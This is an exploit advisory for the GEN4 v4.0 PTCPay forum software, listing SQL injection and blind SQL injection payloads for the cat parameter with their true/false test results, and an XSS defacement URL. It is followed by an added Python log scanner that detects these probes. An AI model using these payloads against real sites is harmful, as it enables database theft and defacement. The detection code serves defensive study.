GEN4 v4.0 PTCPay Multi Vulnerability

Author: indoushka , Published: 25-10-2014
Vendor : http://www.p30vel.ir/
Dork : GeN4 © 2009
======================================

SQL injection :

http://127.0.0.1/GEN/forum/main_forum.php?cat=1 (inject here)

login : http://127.0.0.1/GEN/admin/

( XSS / HTML Inject ) :

http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1

Blind SQL Injection :

This vulnerability affects /GEN/forum/main_forum.php.

Attack details
URL encoded GET input cat was set to 1/**/AND/**/307=307

Tests performed:
0+0+0+1 => TRUE
0+307*302+1 => FALSE
11-5-2-999 => FALSE
11-5-2-3 => TRUE
11-2*5+0+0+1-1 => TRUE
11-2*6+0+0+1-1 => FALSE
1 AND 2+1-1-1=1 AND 307=307 => TRUE
1 AND 3+1-1-1=1 AND 307=307 => FALSE
1 AND 3*2<5 AND 307=307 => FALSE
1 AND 3*2>5 AND 307=307 => TRUE
1/**/AND/**/0=1/**/AND/**/307=307 => FALSE
1/**/AND/**/307=307 => TRUE

Original value: 1
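
Added example (not part of the original advisory, and not the vendor's code): a log check a defender can run to spot the probe patterns listed above, i.e. a cat value on main_forum.php that is not a plain integer, and markup in the a parameter of search.php. The log format, client addresses and function names are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines: the parameter values are probe strings from
# the advisory above; client addresses, timestamps and sizes are made up.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Oct/2014:10:00:01 +0000] "GET /GEN/forum/main_forum.php?cat=1 HTTP/1.1" 200 5120
192.0.2.44 - - [25/Oct/2014:10:00:02 +0000] "GET /GEN/forum/main_forum.php?cat=1/**/AND/**/307=307 HTTP/1.1" 200 5120
192.0.2.44 - - [25/Oct/2014:10:00:03 +0000] "GET /GEN/forum/main_forum.php?cat=11-2*6%2B0%2B0%2B1-1 HTTP/1.1" 200 312
192.0.2.44 - - [25/Oct/2014:10:00:04 +0000] "GET /GEN/forum/main_forum.php?cat=1%20AND%203*2%3E5%20AND%20307=307 HTTP/1.1" 200 5120
192.0.2.44 - - [25/Oct/2014:10:00:06 +0000] "GET /GEN/forum/search.php?a=1%3Cmarquee%3Ex%3C/marquee%3E&q=1&Submit=1 HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(path, params):
    """Return the set of reasons a request resembles one of the advisory's probes."""
    tags = set()
    if path.endswith("/forum/main_forum.php"):
        for value in params.get("cat", []):
            if re.fullmatch(r"\d+", value):
                continue  # a category id should be digits only
            tags.add("non-integer-cat")
            if re.search(r"/\*.*?\*/", value):
                tags.add("sql-comment")      # /**/ used in place of spaces
            if re.search(r"\b(?:and|or)\b", value, re.I):
                tags.add("boolean-clause")   # appended AND/OR condition
            if re.search(r"[-+*<>=]", value):
                tags.add("operator")         # arithmetic or comparison test
    elif path.endswith("/forum/search.php"):
        if any(re.search(r"[<>]", v) for v in params.get("a", [])):
            tags.add("markup-in-a")          # HTML reflected via parameter a
    return tags

def scan(log_text):
    """Map client address -> list of (request target, sorted tags) for flagged requests."""
    findings = {}
    for m in filter(None, map(REQUEST.match, log_text.splitlines())):
        client, target = m.groups()
        url = urlsplit(target)
        tags = classify(url.path, parse_qs(url.query))  # parse_qs percent-decodes
        if tags:
            findings.setdefault(client, []).append((target, sorted(tags)))
    return findings

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        print(client, hits)
```

A burst of flagged requests from one client against the same parameter, as in the sample, is the signature of the true/false test sequence shown above.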